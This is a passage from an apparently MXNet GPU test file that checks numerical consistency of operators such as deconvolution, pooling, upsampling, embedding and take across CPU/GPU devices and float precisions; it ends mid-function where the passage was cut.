sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), pad=(1,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), stride=(2,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), stride=(2,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), dilate=(2,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), dilate=(2,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 2D deconvolution
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), pad=(1,1), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), pad=(1,1), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), stride=(2,2), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), stride=(2,2), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), dilate=(2,2), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), dilate=(2,2), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# # 3D deconvolution (not yet enabled)
# ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# # Pad > 0
# sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
# sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
# check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# # Stride > 1
# sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), name='conv')
# sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), cudnn_off=True, name='conv')
# check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
@with_seed(1234)
def test_bilinear_sampler_with_type():
data = mx.sym.Variable('data')
grid = mx.sym.Variable('grid')
sym = mx.sym.BilinearSampler(data=data, grid=grid)
ctx_list = [{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float64}},
{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float32}},
{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float16}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float64}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@with_seed()
def test_grid_generator_with_type():
data = mx.sym.Variable('data')
sym = mx.sym.GridGenerator(data=data, transform_type='affine', target_shape=(20, 20))
ctx_list = [{'ctx': mx.gpu(0), 'data': (3, 6), 'type_dict': {'data': np.float32}},
{'ctx': mx.cpu(0), 'data': (3, 6), 'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
sym = mx.sym.GridGenerator(data=data, transform_type='warp', target_shape=(20, 20))
ctx_list = [{'ctx': mx.gpu(0), 'data': (3, 2, 20, 20), 'type_dict': {'data': np.float32}},
{'ctx': mx.cpu(0), 'data': (3, 2, 20, 20), 'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/7645")
@with_seed(1234)
def test_spatial_transformer_with_type():
data = mx.sym.Variable('data')
loc = mx.sym.Flatten(data)
loc = mx.sym.FullyConnected(data=loc, num_hidden=10)
loc = mx.sym.Activation(data=loc, act_type='relu')
loc = mx.sym.FullyConnected(data=loc, num_hidden=6)
sym = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=(10, 10),
transform_type="affine", sampler_type="bilinear")
ctx_list = [{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'type_dict': {'data': np.float32}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
# Checking max pooling consistency across data sets of different float types is
# problematic, because the max value of a float32 data set may land at a different
# position once the data is cast to float16. Note that this definition reuses the
# name test_pooling_with_type, so it shadows the earlier definition above and is the
# one the test runner collects (a minimal numpy illustration follows this function).
@with_seed(1234)
def test_pooling_with_type():
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float32}},
{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float16}},
{'ctx': mx.cpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.cpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float32}}]
sym = mx.sym.Pooling(name='pool', kernel=(3,3), stride=(2,2), pool_type='max')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(name='pool', kernel=(3,3), pad=(1,1), pool_type='avg')
check_consistency(sym, ctx_list)
# this is unstable
# sym = mx.sym.Pooling(name='pool', kernel=(5,5), pad=(2,2), pool_type='max')
# check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(name='pool', kernel=(3,3), pad=(1,1), pool_type='sum')
check_consistency(sym, ctx_list)
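# Illustrative sketch (not part of the test suite): why max pooling results can
# legitimately differ across float widths, as noted in the comment above. Two values
# that are distinct in float32 can round to the same float16 value, so the location
# (and gradient routing) of the maximum is no longer well defined.
def _fp16_max_ambiguity_sketch():
    import numpy as np
    window = np.array([1.0001, 1.0002], dtype=np.float32)
    as_fp16 = window.astype(np.float16)
    # float32 picks index 1; in float16 both entries round to 1.0 and argmax
    # falls back to the first index, so the two backends may disagree.
    return int(np.argmax(window)), int(np.argmax(as_fp16))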
@with_seed()
def test_pooling_versions():
def test_pooling_versions_helper(pool_op_list, data, kernel, pool_type, pad, stride,
pooling_convention='valid', global_pool=False):
ctx_list = []
sym_list = []
# PoolingV1 cpu
if 'pool_v1_cpu' in pool_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
if not global_pool:
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, name='pool'))
else:
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pool_type=pool_type, global_pool=True, name='pool'))
# PoolingV1 gpu
if 'pool_v1_gpu' in pool_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
if not global_pool:
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, name='pool'))
else:
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pool_type=pool_type, global_pool=True, name='pool'))
# Pooling cpu
if 'pool_cpu' in pool_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
if not global_pool:
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, name='pool'))
else:
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, global_pool=True, name='pool'))
# Pooling gpu
if 'pool_gpu' in pool_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
if not global_pool:
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, cudnn_off=True, name='pool'))
else:
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, global_pool=True, cudnn_off=True,
name='pool'))
# CuDNNPooling
if 'pool_cudnn' in pool_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
if not global_pool:
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, cudnn_off=False, name='pool'))
else:
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, global_pool=True, cudnn_off=False,
name='pool'))
check_consistency(sym_list, ctx_list)
def test_1d_pooling(pool_type):
data = (2, 3, 20)
kernel = (4,)
pad = (0,)
stride = (1,)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False)
pad = (2,)
stride = (2,)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False)
pad = (0,)
stride = (1,)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False)
pad = (2,)
stride = (2,)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
global_pool=True)
def test_2d_pooling(pool_type):
data = (2, 3, 20, 20)
kernel = (4, 5)
pad = (0, 0)
stride = (1, 1)
test_pooling_versions_helper(pool_op_list=['pool_v1_cpu', 'pool_v1_gpu', 'pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False)
# pool_v1 has bugs when pad is not 0, do not test PoolingV1 here
pad = (2, 3)
stride = (2, 3)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False)
pad = (0, 0)
stride = (1, 1)
test_pooling_versions_helper(pool_op_list=['pool_v1_cpu', 'pool_v1_gpu', 'pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False)
# pool_v1 has bugs when pad is not 0, do not test PoolingV1 here
pad = (2, 3)
stride = (2, 3)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False)
test_pooling_versions_helper(pool_op_list=['pool_v1_cpu', 'pool_v1_gpu', 'pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
global_pool=True)
def test_3d_pooling(pool_type):
data = (2, 3, 20, 20, 20)
kernel = (4, 5, 3)
pad = (0, 0, 0)
stride = (1, 1, 1)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False)
pad = (2, 3, 3)
stride = (2, 3, 1)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False)
pad = (0, 0, 0)
stride = (1, 1, 1)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False)
pad = (2, 3, 3)
stride = (2, 3, 1)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
global_pool=True)
test_1d_pooling('max')
test_1d_pooling('avg')
test_1d_pooling('sum')
test_2d_pooling('max')
test_2d_pooling('avg')
test_2d_pooling('sum')
test_3d_pooling('max')
test_3d_pooling('avg')
test_3d_pooling('sum')
@with_seed()
def test_global_pooling():
def test_1d_pooling(pool_type):
data = (2, 3, 20)
kernel = (4,)
pad = (2,)
stride = (2,)
ctx_list = []
sym_list = []
pooling_convention = 'valid'
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, cudnn_off=True, name='pool'))
check_consistency(sym_list, ctx_list)
def test_2d_pooling(pool_type):
data = (2, 3, 20, 20)
kernel = (4, 4)
pad = (2, 2)
stride = (2, 2)
ctx_list = []
sym_list = []
pooling_convention = 'valid'
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, cudnn_off=True, name='pool'))
check_consistency(sym_list, ctx_list)
test_1d_pooling('max')
test_1d_pooling('avg')
test_1d_pooling('sum')
test_2d_pooling('max')
test_2d_pooling('avg')
test_2d_pooling('sum')
@with_seed()
def test_upsampling_with_type():
sym = mx.sym.UpSampling(scale=2, num_filter=2, name='up', sample_type='nearest', num_args=1)
ctx_list = [{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float64}},
{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float32}},
{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float16}},
{'ctx': mx.cpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float64}},
{'ctx': mx.cpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_upsampling_bilinear_with_type():
sym = mx.sym.UpSampling(scale=2, num_filter=2, name='up', sample_type='bilinear', num_args=1)
ctx_list = [{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float64}},
{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float32}},
{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float16}},
{'ctx': mx.cpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float64}},
{'ctx': mx.cpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_concat_with_type():
sym = mx.sym.Concat(name='concat', num_args=2)
ctx_list = [{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float64, 'concat_arg1': np.float64}},
{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float32, 'concat_arg1': np.float32}},
{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float16, 'concat_arg1': np.float16}},
{'ctx': mx.cpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float64, 'concat_arg1': np.float64}},
{'ctx': mx.cpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float32, 'concat_arg1': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_elementwisesum_with_type():
dev_types = [[mx.gpu(0), [np.float64, np.float32, np.float16]],
[mx.cpu(0), [np.float64, np.float32]] ]
for num_args in range(1, 6):
ews_arg_shape = {}
for i in range(num_args):
ews_arg_shape['ews_arg'+str(i)] = (2, 10)
sym = mx.sym.ElementWiseSum(name='ews', num_args=num_args)
ctx_list = []
for dev, types in dev_types:
for dtype in types:
ews_arg_dtype = {'type_dict':{}}
for i in range(num_args):
ews_arg_dtype['type_dict']['ews_arg'+str(i)] = dtype
ctx_elem = {'ctx': dev}
ctx_elem.update(ews_arg_shape)
ctx_elem.update(ews_arg_dtype)
ctx_list.append(ctx_elem)
check_consistency(sym, ctx_list)
@with_seed()
def test_reshape_with_type():
sym = mx.sym.Reshape(name='reshape', shape=(-1,1,1,0))
ctx_list = [{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float64}},
{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float32}},
{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float16}},
{'ctx': mx.cpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float64}},
{'ctx': mx.cpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_blockgrad_with_type():
sym = mx.sym.BlockGrad(name='bg')
ctx_list = [{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float64}},
{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float32}},
{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float16}},
{'ctx': mx.cpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float64}},
{'ctx': mx.cpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_swapaxis_with_type():
sym = mx.sym.SwapAxis(name='swap', dim1=1)
ctx_list = [{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float64}},
{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float32}},
{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float16}},
{'ctx': mx.cpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float64}},
{'ctx': mx.cpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_fullyconnected_with_type():
sym = mx.sym.FullyConnected(num_hidden=3, name='inner')
ctx_list = [{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float64}},
{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float32}},
{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float16}},
{'ctx': mx.cpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float64}},
{'ctx': mx.cpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float32}}]
check_consistency(sym, ctx_list)
# Sizes are divisible by 8 to test TensorCore on Volta GPU.
sym = mx.sym.FullyConnected(num_hidden=8, name='inner')
ctx_list = [{'ctx': mx.gpu(0), 'inner_data': (16, 24), 'type_dict': {'inner_data': np.float16}},
{'ctx': mx.cpu(0), 'inner_data': (16, 24), 'type_dict': {'inner_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_activation_with_type():
sym = mx.sym.Activation(name='act', act_type='sigmoid')
ctx_list = [{'ctx': mx.gpu(0), 'act_data': (2, 2, 10, 10), 'type_dict': {'act_data': np.float64}},
{'ctx': mx.gpu(0), 'act_data': (2, 2, 10, 10), 'type_dict': {'act_data': np.float32}},
{'ctx': mx.gpu(0), 'act_data': (2, 2, 10, 10), 'type_dict': {'act_data': np.float16}},
{'ctx': mx.cpu(0), 'act_data': (2, 2, 10, 10), 'type_dict': {'act_data': np.float64}},
{'ctx': mx.cpu(0), 'act_data': (2, 2, 10, 10), 'type_dict': {'act_data': np.float32}},
{'ctx': mx.cpu(0), 'act_data': (2, 2, 10, 10), 'type_dict': {'act_data': np.float16}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_lrn():
sym = mx.sym.LRN(alpha=0.0001, beta=0.75, knorm=2, nsize=5, name='lrn')
ctx_list = [{'ctx': mx.gpu(0), 'lrn_data': (2, 6, 10, 10), 'type_dict': {'lrn_data': np.float32}},
{'ctx': mx.cpu(0), 'lrn_data': (2, 6, 10, 10), 'type_dict': {'lrn_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_embedding_with_type():
def test_embedding_helper(data_types, weight_types, low_pad, high_pad):
NVD = [[20, 10, 20], [200, 10, 300]]
for N, V, D in NVD:
sym = mx.sym.Embedding(name='embedding', input_dim=V, output_dim=D)
ctx_list = []
for data_type in data_types:
for weight_type in weight_types:
ctx_list.append({'ctx': mx.gpu(0), 'embedding_data': (N,),
'type_dict': {'embedding_data': data_type, 'embedding_weight': weight_type}})
ctx_list.append({'ctx': mx.cpu(0), 'embedding_data': (N,),
'type_dict': {'embedding_data': data_type, 'embedding_weight': weight_type}})
arg_params = {'embedding_data': np.random.randint(low=-low_pad, high=V+high_pad, size=(N,))}
check_consistency(sym, ctx_list, grad_req={'embedding_data': 'null','embedding_weight': 'write'},
arg_params=arg_params)
data_types = [np.float16, np.float32, np.float64, np.int32]
weight_types = [np.float16, np.float32, np.float64]
test_embedding_helper(data_types, weight_types, 5, 5)
data_types = [np.uint8]
weight_types = [np.float16, np.float32, np.float64]
test_embedding_helper(data_types, weight_types, 0, 5)
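# Illustrative sketch (not part of the test suite): for indices inside [0, input_dim),
# an embedding lookup is a plain row gather from the weight matrix, which is what the
# consistency check above compares across devices and dtypes. Behaviour for the
# deliberately out-of-range indices used above is left to the operator and is not
# modelled here.
def _embedding_gather(weight, indices):
    import numpy as np
    return np.asarray(weight)[np.asarray(indices, dtype=np.int64)]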
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/8288")
@with_seed()
def test_svmoutput_with_type():
sym = mx.sym.SVMOutput(name='svmoutput', use_linear=True)
ctx_list = [{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float64}},
{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float32}},
{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float16}},
{'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float64}},
{'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float32}},
{'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float16}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_take_with_type():
sym = mx.sym.take(name='take')
for data_ndim in range(2, 5):
for idx_ndim in range(1, 4):
data_shape = ()
for _ in range(data_ndim):
data_shape += (np.random.randint(low=3, high=6), )
idx_shape = ()
for _ in range(idx_ndim):
idx_shape += (np.random.randint(low=3, high=5), )
ctx_list = [{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float64,
'take_a': np.float64}},
{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float32,
'take_a': np.float32}},
{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float16,
'take_a': np.float16}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float64,
'take_a': np.float64}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float32,
'take_a': np.float32}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float16,
'take_a': np.float16}}]
arg_params = {'take_indices': np.random.randint(low=0,
high=data_shape[0],
size=idx_shape),
'take_a': np.random.normal(size=data_shape)}
check_consistency(sym, ctx_list,
grad_req={'take_indices': 'null',
'take_a': 'write'},
arg_params=arg_params)
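# Illustrative sketch (not part of the test suite): along axis 0, mx.sym.take is
# assumed to behave like numpy's take / fancy indexing, which is the shape pattern
# exercised above (idx_shape leading dims followed by data_shape[1:]).
def _take_reference(a, indices):
    import numpy as np
    a = np.asarray(a)
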